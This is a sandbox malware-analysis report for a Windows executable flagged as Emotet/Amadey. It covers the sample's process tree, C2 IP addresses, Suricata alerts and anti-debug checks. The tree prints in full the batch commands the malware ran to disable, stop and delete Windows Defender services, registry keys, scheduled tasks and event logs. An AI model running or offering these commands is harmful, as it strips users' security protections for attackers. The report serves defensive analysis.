Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 4, 2025, 12:45 p.m.	May 4, 2025, 12:50 p.m.

Size	4.7MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`495905a33187563768a8e210f43bc31f`
SHA256	`2fd927bea5dfa7f7758137ec3603faf63c60890355456888be9e194ed95daa7f`
CRC32	`10A1A8E2`
ssdeep	`98304:t8rKNYx7s7GeVF/hw7yctrDMwQxjTs6yg9BJ+I4WRNz7cwQXAmwiRc:Crjx7Be7avrDMwQxtB4MRl7cxXpc`
PDB Path	wextract.pdb
Yara	PE_Header_Zero - PE File Signature Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet CAB_file_format - CAB archive file Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet Malicious_Library_Zero - Malicious_Library IsPE32 - (no description) UPX_Zero - UPX packed file

download.php "C:\Users\test22\AppData\Local\Temp\download.php"
2568
- v7n53.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\v7n53.exe
  2644
  - 1z90E9.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\1z90E9.exe
    2700
    - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\34.bat" "
      2792
      - cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\34.bat" any_word
        2904
        
        chcp.com chcp 65001
        2988
        
        reg.exe reg query "HKU\S-1-5-19"
        1964
        
        reg.exe reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
        2208
        
        NSudoLG.exe NSudoLG -U:T -P:E -UseCurrentConsole C:\Users\test22\AppData\Local\Temp\34.bat
        2256
        
        cmd.exe cmd /c C:\Users\test22\AppData\Local\Temp\34.bat
        2356
        
        cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\34.bat" any_word
        2748
        
        chcp.com chcp 65001
        3028
        
        reg.exe reg query "HKU\S-1-5-19"
        800
        
        reg.exe reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
        3044
        
        mode.com Mode 79,49
        2068
        
        cmd.exe C:\Windows\system32\cmd.exe /c ver
        2244
        
        reg.exe reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
        2484
        
        find.exe find /i "0x0"
        2508
        
        cmd.exe C:\Windows\system32\cmd.exe /c tasklist
        2572
        
        tasklist.exe tasklist
        2640
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\WinDefend"
        2960
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"
        3052
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"
        1384
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\Sense"
        2392
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\wscsvc"
        2420
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"
        2544
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"
        2848
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"
        2784
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"
        2760
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"
        2108
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdBoot"
        2224
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdFilter"
        2480
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"
        1796
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"
        2844
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"
        2952
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"
        1504
        
        reg.exe reg query HKLM\System\CurrentControlset\Services\WdFilter
        1064
        
        reg.exe reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"
        2600
        
        find.exe find /i "Windows 7"
        2788
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ver "
        1404
        
        findstr.exe findstr /c:"6.1.7601"
        2804
        
        sc.exe sc config "WinDefend" start= disabled
        812
        
        sc.exe sc stop "WinDefend"
        1256
        
        sc.exe sc delete "WinDefend"
        1576
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        1168
        
        sc.exe sc config "MDCoreSvc" start= disabled
        2064
        
        sc.exe sc stop "MDCoreSvc"
        3080
        
        sc.exe sc delete "MDCoreSvc"
        3132
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        3180
        
        sc.exe sc config "WdNisSvc" start= disabled
        3224
        
        sc.exe sc stop "WdNisSvc"
        3272
        
        sc.exe sc delete "WdNisSvc"
        3320
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        3368
        
        sc.exe sc config "Sense" start= disabled
        3412
        
        sc.exe sc stop "Sense"
        3460
        
        sc.exe sc delete "Sense"
        3508
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        3556
        
        sc.exe sc config "wscsvc" start= disabled
        3600
        
        sc.exe sc stop "wscsvc"
        3648
        
        sc.exe sc delete "wscsvc"
        3696
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        3744
        
        sc.exe sc config "SgrmBroker" start= disabled
        3832
        
        sc.exe sc stop "SgrmBroker"
        3892
        
        sc.exe sc delete "SgrmBroker"
        3956
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        4004
        
        sc.exe sc config "SecurityHealthService" start= disabled
        4048
        
        sc.exe sc stop "SecurityHealthService"
        3076
        
        sc.exe sc delete "SecurityHealthService"
        2296
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        3164
        
        sc.exe sc config "webthreatdefsvc" start= disabled
        3220
        
        sc.exe sc stop "webthreatdefsvc"
        3284
        
        sc.exe sc delete "webthreatdefsvc"
        3364
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        3424
        
        sc.exe sc config "webthreatdefusersvc" start= disabled
        3540
        
        sc.exe sc stop "webthreatdefusersvc"
        3596
        
        sc.exe sc delete "webthreatdefusersvc"
        3676
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        740
        
        sc.exe sc config "WdNisDrv" start= disabled
        3808
        
        sc.exe sc stop "WdNisDrv"
        1332
        
        sc.exe sc delete "WdNisDrv"
        1376
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        3896
        
        sc.exe sc config "WdBoot" start= disabled
        4020
        
        sc.exe sc stop "WdBoot"
        4092
        
        sc.exe sc delete "WdBoot"
        2300
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        3160
        
        sc.exe sc config "WdFilter" start= disabled
        3276
        
        sc.exe sc stop "WdFilter"
        3408
        
        sc.exe sc delete "WdFilter"
        3528
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        3632
        
        sc.exe sc config "SgrmAgent" start= disabled
        3728
        
        sc.exe sc stop "SgrmAgent"
        3748
        
        sc.exe sc delete "SgrmAgent"
        2000
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        4076
        
        sc.exe sc config "MsSecWfp" start= disabled
        3124
        
        sc.exe sc stop "MsSecWfp"
        3312
        
        sc.exe sc delete "MsSecWfp"
        3456
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        3536
        
        sc.exe sc config "MsSecFlt" start= disabled
        1668
        
        sc.exe sc stop "MsSecFlt"
        936
        
        sc.exe sc delete "MsSecFlt"
        3968
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        3880
        
        sc.exe sc config "MsSecCore" start= disabled
        3288
        
        sc.exe sc stop "MsSecCore"
        3500
        
        sc.exe sc delete "MsSecCore"
        3464
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        3924
        
        schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        3252
        
        schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        3660
        
        schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        3784
        
        schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        3400
        
        schtasks.exe schtasks /Delete /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /f
        1308
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows Defender" /f
        3452
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows Defender Security Center" /f
        4064
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows Advanced Threat Protection" /f
        3428
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows Security Health" /f
        3904
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderApiLogger" /f
        4128
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderAuditLogger" /f
        4172
        
        reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        4216
        
        reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        4260
        
        reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        4304
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        4348
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
        4440
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
        4484
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Windows Defender" /f
        4528
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC" /f
        4672
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\NIS-Driver-WFP/Diagnostic" /f
        4716
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /f
        4764
        
        reg.exe reg delete "HKLM\Software\Microsoft\SystemSettings\SettingId\SystemSettings_WindowsDefender_UseWindowsDefender" /f
        4816
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" /f
        4868
        
        sc.exe sc start VMTools
        4912
        
        sc.exe sc start VMTools
        4960
  - 2y9197.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\2y9197.exe
    2852
    - ramez.exe "C:\Users\test22\AppData\Local\Temp\d610cf342e\ramez.exe"
      1152
      - lYvr05n.exe "C:\Users\test22\AppData\Local\Temp\10015950101\lYvr05n.exe"
        2588
      - FuaxeNA.exe "C:\Users\test22\AppData\Local\Temp\10017910101\FuaxeNA.exe"
        3792
      - OE1vOqz.exe "C:\Users\test22\AppData\Local\Temp\10018450101\OE1vOqz.exe"
        1316
      - dDthTIC.exe "C:\Users\test22\AppData\Local\Temp\10019230101\dDthTIC.exe"
        4392
      - 2d05347e68.exe "C:\Users\test22\AppData\Local\Temp\10020170101\2d05347e68.exe"
        5104
        
        cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\34.bat" "
        4184
        
        cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\34.bat" any_word
        4272
        
        chcp.com chcp 65001
        4420
        
        reg.exe reg query "HKU\S-1-5-19"
        4500
        
        reg.exe reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
        4568
        
        NSudoLG.exe NSudoLG -U:T -P:E -UseCurrentConsole C:\Users\test22\AppData\Local\Temp\34.bat
        4608
        
        cmd.exe cmd /c C:\Users\test22\AppData\Local\Temp\34.bat
        4692
        
        cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\34.bat" any_word
        4836
        
        chcp.com chcp 65001
        4976
        
        reg.exe reg query "HKU\S-1-5-19"
        2944
        
        reg.exe reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
        3952
        
        mode.com Mode 79,49
        4116
        
        cmd.exe C:\Windows\system32\cmd.exe /c ver
        4148
        
        reg.exe reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
        4344
        
        find.exe find /i "0x0"
        4228
        
        cmd.exe C:\Windows\system32\cmd.exe /c tasklist
        4544
        
        tasklist.exe tasklist
        4600
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\WinDefend"
        4616
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"
        4880
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"
        4788
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\Sense"
        4860
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\wscsvc"
        4212
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"
        4264
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"
        4644
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"
        2132
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"
        4408
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"
        4944
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdBoot"
        4988
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdFilter"
        5108
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"
        4512
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"
        2128
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"
        4888
        
        reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"
        4104
        
        reg.exe reg query HKLM\System\CurrentControlset\Services\WdFilter
        4468
        
        reg.exe reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"
        4596
        
        find.exe find /i "Windows 7"
        5012
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ver "
        4640
        
        findstr.exe findstr /c:"6.1.7601"
        4144
        
        sc.exe sc config "WinDefend" start= disabled
        4928
        
        sc.exe sc stop "WinDefend"
        4532
        
        sc.exe sc delete "WinDefend"
        4140
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        5160
        
        sc.exe sc config "MDCoreSvc" start= disabled
        5204
        
        sc.exe sc stop "MDCoreSvc"
        5296
        
        sc.exe sc delete "MDCoreSvc"
        5348
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        5396
        
        sc.exe sc config "WdNisSvc" start= disabled
        5540
        
        sc.exe sc stop "WdNisSvc"
        5588
        
        sc.exe sc delete "WdNisSvc"
        5636
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        5684
        
        sc.exe sc config "Sense" start= disabled
        5760
        
        sc.exe sc stop "Sense"
        5808
        
        sc.exe sc delete "Sense"
        5856
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        5928
        
        sc.exe sc config "wscsvc" start= disabled
        5972
        
        sc.exe sc stop "wscsvc"
        6020
        
        sc.exe sc delete "wscsvc"
        6068
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        6116
        
        sc.exe sc config "SgrmBroker" start= disabled
        5140
        
        sc.exe sc stop "SgrmBroker"
        5224
        
        sc.exe sc delete "SgrmBroker"
        5300
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        5556
        
        sc.exe sc config "SecurityHealthService" start= disabled
        5620
        
        sc.exe sc stop "SecurityHealthService"
        5680
        
        sc.exe sc delete "SecurityHealthService"
        5788
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        5872
        
        sc.exe sc config "webthreatdefsvc" start= disabled
        5920
        
        sc.exe sc stop "webthreatdefsvc"
        6000
        
        sc.exe sc delete "webthreatdefsvc"
        6024
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        5124
        
        sc.exe sc config "webthreatdefusersvc" start= disabled
        5156
        
        sc.exe sc stop "webthreatdefusersvc"
        5388
        
        sc.exe sc delete "webthreatdefusersvc"
        5632
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        5776
        
        sc.exe sc config "WdNisDrv" start= disabled
        5852
        
        sc.exe sc stop "WdNisDrv"
        5968
        
        sc.exe sc delete "WdNisDrv"
        6096
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        108
        
        sc.exe sc config "WdBoot" start= disabled
        5560
        
        sc.exe sc stop "WdBoot"
        6108
        
        sc.exe sc delete "WdBoot"
        5836
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        5884
        
        sc.exe sc config "WdFilter" start= disabled
        5792
        
        sc.exe sc stop "WdFilter"
        676
        
        sc.exe sc delete "WdFilter"
        1708
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        5860
        
        sc.exe sc config "SgrmAgent" start= disabled
        6004
        
        sc.exe sc stop "SgrmAgent"
        5984
        
        sc.exe sc delete "SgrmAgent"
        5192
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        6032
        
        sc.exe sc config "MsSecWfp" start= disabled
        6172
        
        sc.exe sc stop "MsSecWfp"
        6228
        
        sc.exe sc delete "MsSecWfp"
        6276
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        6324
        
        sc.exe sc config "MsSecFlt" start= disabled
        6368
        
        sc.exe sc stop "MsSecFlt"
        6416
        
        sc.exe sc delete "MsSecFlt"
        6464
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        6512
        
        sc.exe sc config "MsSecCore" start= disabled
        6556
        
        sc.exe sc stop "MsSecCore"
        6604
        
        sc.exe sc delete "MsSecCore"
        6652
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        6700
        
        schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        6768
        
        schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        6816
        
        schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        6864
        
        schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        6912
        
        schtasks.exe schtasks /Delete /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /f
        6960
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows Defender" /f
        7008
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows Defender Security Center" /f
        7064
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows Advanced Threat Protection" /f
        7108
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows Security Health" /f
        7152
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderApiLogger" /f
        6188
        
        reg.exe reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderAuditLogger" /f
        6244
        
        reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        6308
        
        reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        6384
        
        reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        6444
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        6508
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
        6576
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
        6636
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Windows Defender" /f
        6696
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC" /f
        5328
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\NIS-Driver-WFP/Diagnostic" /f
        6764
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /f
        6772
        
        reg.exe reg delete "HKLM\Software\Microsoft\SystemSettings\SettingId\SystemSettings_WindowsDefender_UseWindowsDefender" /f
        6884
        
        reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" /f
        6944
        
        sc.exe sc start VMTools
        7000
        
        sc.exe sc start VMTools
        7096
      - 207216b66f.exe "C:\Users\test22\AppData\Local\Temp\10020490101\207216b66f.exe"
        5248
      - 39d8455be9.exe "C:\Users\test22\AppData\Local\Temp\10020500101\39d8455be9.exe"
        5932
      - a3e8f181a3.exe "C:\Users\test22\AppData\Local\Temp\10020510101\a3e8f181a3.exe"
        6428
        
        a3e8f181a3.tmp "C:\Users\test22\AppData\Local\Temp\is-6FDHC.tmp\a3e8f181a3.tmp" /SL5="$200180,19201980,844800,C:\Users\test22\AppData\Local\Temp\10020510101\a3e8f181a3.exe"
        6540
        
        putty.exe "C:\Users\test22\AppData\Roaming\MyApp\data\putty.exe"
        6992
        
        core.exe "C:\Users\test22\AppData\Roaming\MyApp\core.exe"
        7128
        
        info.exe "C:\Users\test22\AppData\Roaming\MyApp\info.exe"
        4828
      - dDthTIC.exe "C:\Users\test22\AppData\Local\Temp\10020520101\dDthTIC.exe"
        6720
      - lYvr05n.exe "C:\Users\test22\AppData\Local\Temp\10020530101\lYvr05n.exe"
        5408
      - bPtJj46.exe "C:\Users\test22\AppData\Local\Temp\10020540101\bPtJj46.exe"
        5484
        
        cmd.exe cmd.exe /c 68140be001524.vbs
        6504
      - amnew.exe "C:\Users\test22\AppData\Local\Temp\10020550101\amnew.exe"
        6844
- 3v57I.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\3v57I.exe
  1484
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
185.156.72.96	Active	Moloch
80.64.18.219	Active	Moloch
80.64.18.63	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 185.156.72.96:80 -> 192.168.56.101:49178	2400031	ET DROP Spamhaus DROP Listed Traffic Inbound group 32	Misc Attack
TCP 185.156.72.96:80 -> 192.168.56.101:49178	2060969	ET MALWARE Amadey CnC Response	Malware Command and Control Activity Detected
TCP 192.168.56.101:49193 -> 80.64.18.219:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 80.64.18.219:80 -> 192.168.56.101:49227	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 80.64.18.219:80 -> 192.168.56.101:49227	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 80.64.18.219:80 -> 192.168.56.101:49227	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 80.64.18.219:80 -> 192.168.56.101:49193	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 80.64.18.219:80 -> 192.168.56.101:49193	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 80.64.18.219:80 -> 192.168.56.101:49193	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 80.64.18.219:80 -> 192.168.56.101:49227	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 80.64.18.219:80 -> 192.168.56.101:49227	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 80.64.18.219:80 -> 192.168.56.101:49227	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.101:49227 -> 80.64.18.219:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49500 -> 80.64.18.63:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 80.64.18.63:80 -> 192.168.56.101:49500	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 80.64.18.63:80 -> 192.168.56.101:49500	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 80.64.18.63:80 -> 192.168.56.101:49500	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 80.64.18.219:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (20 events)

Time & API	Arguments	Status	Return
GetComputerNameA May 4, 2025, 12:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:39 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:39 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:38 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:38 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 4, 2025, 12:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:46 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (26 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 4, 2025, 12:45 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:38 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:38 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:45 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
IsDebuggerPresent May 4, 2025, 12:46 p.m.			0	0
